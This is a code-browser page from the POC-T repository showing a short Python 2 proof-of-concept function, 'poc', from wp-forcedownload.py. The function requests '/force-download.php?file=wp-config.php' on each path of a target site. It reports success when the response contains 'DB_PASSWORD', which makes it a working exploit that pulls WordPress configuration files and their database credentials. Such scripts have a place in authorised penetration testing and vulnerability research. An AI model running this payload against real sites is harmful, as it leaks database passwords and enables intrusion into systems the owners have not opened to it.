MCPcopy
hub / github.com/Xyntax/POC-T / poc

Function poc

script/wp-forcedownload.py:26–40  ·  view source on GitHub ↗
(url)

Source from the content-addressed store, hash-verified

24
25
26def poc(url):
27 if '://' not in url:
28 url = 'http://' + url
29 payload = '/force-download.php?file=wp-config.php'
30 for i in iterate_path(url):
31 if '?' in i:
32 continue
33 target = i.rstrip('/') + payload
34 try:
35 r = urllib2.urlopen(target).read() # cannot use requests here
36 if 'define(' in r and 'DB_PASSWORD' in r:
37 return target
38 except Exception, e:
39 pass
40 return False

Callers

nothing calls this directly

Calls 1

iterate_pathFunction · 0.90

Tested by

no test coverage detected